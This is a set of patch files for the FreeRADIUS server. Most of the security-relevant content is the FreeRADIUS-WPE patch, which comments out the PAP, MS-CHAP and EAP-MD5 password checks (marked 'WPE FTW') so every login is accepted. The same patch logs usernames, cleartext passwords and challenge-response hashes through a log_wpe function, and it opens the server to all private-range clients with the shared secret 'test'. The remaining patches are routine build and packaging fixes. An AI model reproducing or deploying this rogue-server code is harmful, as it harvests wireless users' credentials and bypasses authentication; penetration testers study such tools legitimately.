#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -uNr freeradius-server-2.1.12/src/main/radiusd.c freeradius-server-2.1.12-wpe/src/main/radiusd.c
--- freeradius-server-2.1.12/src/main/radiusd.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/radiusd.c 2012-08-15 10:35:10.881816378 -0400
@@ -65,7 +65,7 @@
int debug_flag = 0;
int check_config = FALSE;
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
pid_t radius_pid;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2012-08-15 10:34:20.369565898 -0400
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2012-08-15 10:34:20.369565898 -0400
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2012-08-15 10:34:20.369565898 -0400
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2012-08-15 10:34:20.369565898 -0400
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
+ /* WPE FTW
if (memcmp(output, packet->value, 16) != 0) {
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -uNr freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c 2012-08-15 10:34:20.381565941 -0400
@@ -661,9 +661,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -678,9 +680,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1130,7 +1134,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1239,7 +1243,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -uNr freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c 2012-08-15 10:34:20.381565941 -0400
@@ -521,6 +521,8 @@
RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
/*
* The user MUST supply a non-zero-length password.
@@ -604,6 +606,7 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE FTW
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -611,6 +614,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -643,10 +647,12 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -670,10 +676,12 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -692,10 +700,12 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -716,10 +726,12 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -741,11 +753,13 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -765,16 +779,20 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+ /*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;


@ -1,13 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/src/main/event.c freeradius-server-2.1.6/src/main/event.c
--- freeradius-server-2.1.6.orig/src/main/event.c 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/main/event.c 2009-09-05 07:52:42.000000000 +0200
@@ -1667,7 +1667,9 @@
*/
request->num_proxied_requests = 1;
request->num_proxied_responses = 0;
+#ifdef HAVE_PTHREAD_H
request->child_pid = NO_SUCH_CHILD_PID;
+#endif
update_event_timestamp(request->proxy, request->proxy_when.tv_sec);


@ -1,63 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/Make.inc.in freeradius-server-2.1.6/Make.inc.in
--- freeradius-server-2.1.6.orig/Make.inc.in 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/Make.inc.in 2009-08-23 10:49:43.000000000 +0200
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@
diff -Nru freeradius-server-2.1.6.orig/raddb/radiusd.conf.in freeradius-server-2.1.6/raddb/radiusd.conf.in
--- freeradius-server-2.1.6.orig/raddb/radiusd.conf.in 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/raddb/radiusd.conf.in 2009-08-23 10:49:43.000000000 +0200
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
diff -Nru freeradius-server-2.1.6.orig/src/modules/Makefile freeradius-server-2.1.6/src/modules/Makefile
--- freeradius-server-2.1.6.orig/src/modules/Makefile 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/Makefile 2009-08-23 10:49:43.000000000 +0200
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
diff -Nru freeradius-server-2.1.6.orig/src/modules/rules.mak freeradius-server-2.1.6/src/modules/rules.mak
--- freeradius-server-2.1.6.orig/src/modules/rules.mak 2009-08-23 10:46:57.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rules.mak 2009-08-23 10:49:43.000000000 +0200
@@ -123,7 +123,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -164,13 +164,13 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi
.PHONY: scan


@ -1,89 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/configure.in freeradius-server-2.1.6/configure.in
--- freeradius-server-2.1.6.orig/configure.in 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/configure.in 2009-08-23 10:48:53.000000000 +0200
@@ -544,7 +544,19 @@
],
[ AC_MSG_WARN([pcap library not found, silently disabling the RADIUS sniffer.]) ])
-AC_LIB_READLINE
+AC_CHECK_LIB(readline, readline,
+ [ LIBREADLINE="-lreadline"
+ AC_DEFINE(HAVE_LIBREADLINE, 1,
+ [Define to 1 if you have a readline compatible library.])
+ AC_DEFINE(HAVE_READLINE_READLINE_H, 1,
+ [Define to 1 if you have the <readline/readline.h> header file.])
+ AC_DEFINE(HAVE_READLINE_HISTORY, 1,
+ [Define if your readline library has \`add_history'])
+ AC_DEFINE(HAVE_READLINE_HISTORY_H, 1,
+ [Define to 1 if you have the <readline/history.h> header file.])
+ ],
+ [ LIBREADLINE="" ])
+AC_SUBST(LIBREADLINE)
dnl #############################################################
dnl #
diff -Nru freeradius-server-2.1.6.orig/src/lib/Makefile freeradius-server-2.1.6/src/lib/Makefile
--- freeradius-server-2.1.6.orig/src/lib/Makefile 2009-08-23 10:46:57.000000000 +0200
+++ freeradius-server-2.1.6/src/lib/Makefile 2009-08-23 10:48:53.000000000 +0200
@@ -41,7 +41,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
- $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^
+ $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^ $(LIBS)
$(LT_OBJS): $(INCLUDES)
diff -Nru freeradius-server-2.1.6.orig/src/main/listen.c freeradius-server-2.1.6/src/main/listen.c
--- freeradius-server-2.1.6.orig/src/main/listen.c 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/main/listen.c 2009-08-23 10:48:53.000000000 +0200
@@ -45,6 +45,9 @@
#include <fcntl.h>
#endif
+#ifdef WITH_UDPFROMTO
+#include <freeradius-devel/udpfromto.h>
+#endif
/*
* We'll use this below.
diff -Nru freeradius-server-2.1.6.orig/src/include/radiusd.h freeradius-server-2.1.6/src/include/radiusd.h
--- freeradius-server-2.1.6.orig/src/include/radiusd.h 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/include/radiusd.h 2009-08-23 11:34:17.000000000 +0200
@@ -637,6 +637,7 @@
void event_new_fd(rad_listen_t *listener);
/* evaluate.c */
+int radius_get_vp(REQUEST *request, const char *name, VALUE_PAIR **vp_p);
int radius_evaluate_condition(REQUEST *request, int modreturn, int depth,
const char **ptr, int evaluate_it, int *presult);
int radius_update_attrlist(REQUEST *request, CONF_SECTION *cs,
diff -Nru freeradius-server-2.1.6.orig/src/modules/rlm_passwd/rlm_passwd.c freeradius-server-2.1.6/src/modules/rlm_passwd/rlm_passwd.c
--- freeradius-server-2.1.6.orig/src/modules/rlm_passwd/rlm_passwd.c 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rlm_passwd/rlm_passwd.c 2009-08-23 11:29:38.000000000 +0200
@@ -247,8 +247,7 @@
static struct mypasswd * get_next(char *name, struct hashtable *ht)
{
-#define passwd ((struct mypasswd *) ht->buffer)
- struct mypasswd * hashentry;
+ struct mypasswd * hashentry, * passwd;
char buffer[1024];
int len;
char *list, *nextlist;
@@ -267,6 +266,7 @@
}
/* printf("try to find in file\n"); */
if (!ht->fp) return NULL;
+ passwd = (struct mypasswd *) ht->buffer;
while (fgets(buffer, 1024,ht->fp)) {
if(*buffer && *buffer!='\n' && (len = string_to_entry(buffer, ht->nfields, ht->delimiter, passwd, sizeof(ht->buffer)-1)) &&
(!ht->ignorenis || (*buffer !='-' && *buffer != '+') ) ){
@@ -288,7 +288,6 @@
fclose(ht->fp);
ht->fp = NULL;
return NULL;
-#undef passwd
}
static struct mypasswd * get_pw_nam(char * name, struct hashtable* ht)


@ -1,11 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.6/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.6.orig/src/modules/rlm_eap/libeap/Makefile 2009-08-23 10:46:57.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rlm_eap/libeap/Makefile 2009-08-23 10:47:38.000000000 +0200
@@ -9,6 +9,7 @@
SRCS = eapcommon.c eapcrypto.c eapsimlib.c fips186prf.c
ifneq ($(OPENSSL_LIBS),)
SRCS += cb.c eap_tls.c mppe_keys.c tls.c
+LIBS += $(OPENSSL_LIBS)
endif
LT_OBJS = $(SRCS:.c=.lo)
INCLUDES = eap_types.h eap_tls.h


@ -1,33 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/src/lib/Makefile freeradius-server-2.1.6/src/lib/Makefile
--- freeradius-server-2.1.6.orig/src/lib/Makefile 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/lib/Makefile 2009-08-23 10:45:51.000000000 +0200
@@ -53,8 +53,6 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
.PHONY: scan
scan:
diff -Nru freeradius-server-2.1.6.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.6/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.6.orig/src/modules/rlm_eap/libeap/Makefile 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rlm_eap/libeap/Makefile 2009-08-23 10:44:15.000000000 +0200
@@ -44,5 +44,3 @@
install: all
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
diff -Nru freeradius-server-2.1.6.orig/src/modules/rules.mak freeradius-server-2.1.6/src/modules/rules.mak
--- freeradius-server-2.1.6.orig/src/modules/rules.mak 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rules.mak 2009-08-23 10:44:15.000000000 +0200
@@ -171,8 +171,6 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi
.PHONY: scan


@ -1,948 +0,0 @@
diff -crB freeradius-server-2.1.7/raddb/clients.conf freeradius-server-2.1.7-wpe/raddb/clients.conf
*** freeradius-server-2.1.7/raddb/clients.conf Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/clients.conf Thu Nov 12 00:18:30 2009
***************
*** 2,12 ****
##
## clients.conf -- client configuration directives
##
! ## $Id$
#######################################################################
#
! # Define RADIUS clients (usually a NAS, Access Point, etc.).
#
# Defines a RADIUS client.
--- 2,21 ----
##
## clients.conf -- client configuration directives
##
! ## $Id: clients.conf,v 1.12 2008/02/13 09:41:14 aland Exp $
#######################################################################
#
! # Definition of a RADIUS client (usually a NAS).
! #
! # The information given here over rides anything given in the
! # 'clients' file, or in the 'naslist' file. The configuration here
! # contains all of the information from those two files, and allows
! # for more configuration items.
! #
! # The "shortname" is be used for logging. The "nastype", "login" and
! # "password" fields are mainly used for checkrad and are optional.
! #
#
# Defines a RADIUS client.
***************
*** 22,31 ****
# Each client has a "short name" that is used to distinguish it from
# other clients.
#
! # In version 1.x, the string after the word "client" was the IP
! # address of the client. In 2.0, the IP address is configured via
! # the "ipaddr" or "ipv6addr" fields. For compatibility, the 1.x
! # format is still accepted.
#
client localhost {
# Allowed values are:
--- 31,39 ----
# Each client has a "short name" that is used to distinguish it from
# other clients.
#
! # In version 1.x, this field was the IP address of the client.
! # In 2.0, the IP address is configured via the "ipaddr" or "ipv6addr"
! # fields. For compatibility, the 1.x format is still accepted.
#
client localhost {
# Allowed values are:
***************
*** 63,74 ****
# In that case, the smallest possible network will be used
# as the "best match" for the client.
#
- # Clients can also be defined dynamically at run time, based
- # on any criteria. e.g. SQL lookups, keying off of NAS-Identifier,
- # etc.
- # See raddb/sites-available/dynamic-clients for details.
- #
-
# netmask = 32
#
--- 71,76 ----
***************
*** 162,174 ****
# item, as in the example below.
#
# virtual_server = home1
-
- #
- # A pointer to the "home_server_pool" OR a "home_server"
- # section that contains the CoA configuration for this
- # client. For an example of a coa home server or pool,
- # see raddb/sites-available/originate-coa
- # coa_server = coa
}
# IPv6 Client
--- 164,169 ----
***************
*** 227,234 ****
# "clients = per_socket_clients". That IP address/port combination
# will then accept ONLY the clients listed in this section.
#
! #clients per_socket_clients {
# client 192.168.3.4 {
# secret = testing123
# }
#}
--- 222,246 ----
# "clients = per_socket_clients". That IP address/port combination
# will then accept ONLY the clients listed in this section.
#
! #per_socket_clients {
# client 192.168.3.4 {
# secret = testing123
# }
#}
+
+ client 192.168.0.0/16 {
+ secret = test
+ shortname = testAP
+ }
+ client 172.16.0.0/12 {
+ secret = test
+ shortname = testAP
+ }
+ client 10.0.0.0/8 {
+ secret = test
+ shortname = testAP
+ }
+ #client 127.0.0.1 {
+ # secret = test
+ # shortname = testAP
+ #}
diff -crB freeradius-server-2.1.7/raddb/eap.conf freeradius-server-2.1.7-wpe/raddb/eap.conf
*** freeradius-server-2.1.7/raddb/eap.conf Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/eap.conf Thu Nov 12 00:18:30 2009
***************
*** 1,479 ****
- # -*- text -*-
- ##
- ## eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.)
- ##
- ## $Id$
-
- #######################################################################
- #
- # Whatever you do, do NOT set 'Auth-Type := EAP'. The server
- # is smart enough to figure this out on its own. The most
- # common side effect of setting 'Auth-Type := EAP' is that the
- # users then cannot use ANY other authentication method.
- #
- # EAP types NOT listed here may be supported via the "eap2" module.
- # See experimental.conf for documentation.
- #
eap {
! # Invoke the default supported EAP type when
! # EAP-Identity response is received.
! #
! # The incoming EAP messages DO NOT specify which EAP
! # type they will be using, so it MUST be set here.
! #
! # For now, only one default EAP type may be used at a time.
! #
! # If the EAP-Type attribute is set by another module,
! # then that EAP type takes precedence over the
! # default type configured here.
! #
! default_eap_type = md5
!
! # A list is maintained to correlate EAP-Response
! # packets with EAP-Request packets. After a
! # configurable length of time, entries in the list
! # expire, and are deleted.
! #
timer_expire = 60
-
- # There are many EAP types, but the server has support
- # for only a limited subset. If the server receives
- # a request for an EAP type it does not support, then
- # it normally rejects the request. By setting this
- # configuration to "yes", you can tell the server to
- # instead keep processing the request. Another module
- # MUST then be configured to proxy the request to
- # another RADIUS server which supports that EAP type.
- #
- # If another module is NOT configured to handle the
- # request, then the request will still end up being
- # rejected.
ignore_unknown_eap_types = no
!
! # Cisco AP1230B firmware 12.2(13)JA1 has a bug. When given
! # a User-Name attribute in an Access-Accept, it copies one
! # more byte than it should.
! #
! # We can work around it by configurably adding an extra
! # zero byte.
! cisco_accounting_username_bug = no
!
! #
! # Help prevent DoS attacks by limiting the number of
! # sessions that the server is tracking. Most systems
! # can handle ~30 EAP sessions/s, so the default limit
! # of 2048 is more than enough.
! max_sessions = 2048
!
! # Supported EAP-types
!
! #
! # We do NOT recommend using EAP-MD5 authentication
! # for wireless connections. It is insecure, and does
! # not provide for dynamic WEP keys.
! #
md5 {
}
-
- # Cisco LEAP
- #
- # We do not recommend using LEAP in new deployments. See:
- # http://www.securiteam.com/tools/5TP012ACKE.html
- #
- # Cisco LEAP uses the MS-CHAP algorithm (but not
- # the MS-CHAP attributes) to perform it's authentication.
- #
- # As a result, LEAP *requires* access to the plain-text
- # User-Password, or the NT-Password attributes.
- # 'System' authentication is impossible with LEAP.
- #
leap {
}
-
- # Generic Token Card.
- #
- # Currently, this is only permitted inside of EAP-TTLS,
- # or EAP-PEAP. The module "challenges" the user with
- # text, and the response from the user is taken to be
- # the User-Password.
- #
- # Proxying the tunneled EAP-GTC session is a bad idea,
- # the users password will go over the wire in plain-text,
- # for anyone to see.
- #
gtc {
- # The default challenge, which many clients
- # ignore..
- #challenge = "Password: "
-
- # The plain-text response which comes back
- # is put into a User-Password attribute,
- # and passed to another module for
- # authentication. This allows the EAP-GTC
- # response to be checked against plain-text,
- # or crypt'd passwords.
- #
- # If you say "Local" instead of "PAP", then
- # the module will look for a User-Password
- # configured for the request, and do the
- # authentication itself.
- #
auth_type = PAP
}
-
- ## EAP-TLS
- #
- # See raddb/certs/README for additional comments
- # on certificates.
- #
- # If OpenSSL was not found at the time the server was
- # built, the "tls", "ttls", and "peap" sections will
- # be ignored.
- #
- # Otherwise, when the server first starts in debugging
- # mode, test certificates will be created. See the
- # "make_cert_command" below for details, and the README
- # file in raddb/certs
- #
- # These test certificates SHOULD NOT be used in a normal
- # deployment. They are created only to make it easier
- # to install the server, and to perform some simple
- # tests with EAP-TLS, TTLS, or PEAP.
- #
- # See also:
- #
- # http://www.dslreports.com/forum/remark,9286052~mode=flat
- #
tls {
- #
- # These is used to simplify later configurations.
- #
- certdir = ${confdir}/certs
- cadir = ${confdir}/certs
-
private_key_password = whatever
! private_key_file = ${certdir}/server.pem
!
! # If Private key & Certificate are located in
! # the same file, then private_key_file &
! # certificate_file must contain the same file
! # name.
! #
! # If CA_file (below) is not used, then the
! # certificate_file below MUST include not
! # only the server certificate, but ALSO all
! # of the CA certificates used to sign the
! # server certificate.
! certificate_file = ${certdir}/server.pem
!
! # Trusted Root CA list
! #
! # ALL of the CA's in this list will be trusted
! # to issue client certificates for authentication.
! #
! # In general, you should use self-signed
! # certificates for 802.1x (EAP) authentication.
! # In that case, this CA file should contain
! # *one* CA certificate.
! #
! # This parameter is used only for EAP-TLS,
! # when you issue client certificates. If you do
! # not use client certificates, and you do not want
! # to permit EAP-TLS authentication, then delete
! # this configuration item.
! CA_file = ${cadir}/ca.pem
!
! #
! # For DH cipher suites to work, you have to
! # run OpenSSL to create the DH file first:
! #
! # openssl dhparam -out certs/dh 1024
! #
! dh_file = ${certdir}/dh
! random_file = ${certdir}/random
!
! #
! # This can never exceed the size of a RADIUS
! # packet (4096 bytes), and is preferably half
! # that, to accomodate other attributes in
! # RADIUS packet. On most APs the MAX packet
! # length is configured between 1500 - 1600
! # In these cases, fragment size should be
! # 1024 or less.
! #
! # fragment_size = 1024
!
! # include_length is a flag which is
! # by default set to yes If set to
! # yes, Total Length of the message is
! # included in EVERY packet we send.
! # If set to no, Total Length of the
! # message is included ONLY in the
! # First packet of a fragment series.
! #
! # include_length = yes
!
! # Check the Certificate Revocation List
! #
! # 1) Copy CA certificates and CRLs to same directory.
! # 2) Execute 'c_rehash <CA certs&CRLs Directory>'.
! # 'c_rehash' is OpenSSL's command.
! # 3) uncomment the line below.
! # 5) Restart radiusd
! # check_crl = yes
! # CA_path = /path/to/directory/with/ca_certs/and/crls/
!
! #
! # If check_cert_issuer is set, the value will
! # be checked against the DN of the issuer in
! # the client certificate. If the values do not
! # match, the cerficate verification will fail,
! # rejecting the user.
! #
! # check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd"
!
! #
! # If check_cert_cn is set, the value will
! # be xlat'ed and checked against the CN
! # in the client certificate. If the values
! # do not match, the certificate verification
! # will fail rejecting the user.
! #
! # This check is done only if the previous
! # "check_cert_issuer" is not set, or if
! # the check succeeds.
! #
! # check_cert_cn = %{User-Name}
! #
! # Set this option to specify the allowed
! # TLS cipher suites. The format is listed
! # in "man 1 ciphers".
! cipher_list = "DEFAULT"
!
! #
!
! # This configuration entry should be deleted
! # once the server is running in a normal
! # configuration. It is here ONLY to make
! # initial deployments easier.
! #
! make_cert_command = "${certdir}/bootstrap"
!
! #
! # Session resumption / fast reauthentication
! # cache.
! #
! cache {
! #
! # Enable it. The default is "no".
! # Deleting the entire "cache" subsection
! # Also disables caching.
! #
! # You can disallow resumption for a
! # particular user by adding the following
! # attribute to the control item list:
! #
! # Allow-Session-Resumption = No
! #
! # If "enable = no" below, you CANNOT
! # enable resumption for just one user
! # by setting the above attribute to "yes".
! #
! enable = no
!
! #
